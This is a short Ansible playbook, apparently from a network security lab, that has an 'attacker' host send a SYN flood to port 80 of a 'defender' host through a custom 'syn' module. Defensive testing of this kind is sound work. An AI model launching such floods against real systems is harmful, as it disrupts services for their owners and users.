---

- name: "Attack"
  hosts: attacker
  gather_facts: no
  tasks:
    - name: "syn flooding"
      syn:
        ip_dest: "{{groups.defender.0}}"
        ip_source: "{{ ansible_host }}"
        port_dest: 80
        nb_packets: 15
        packet_size: 1024
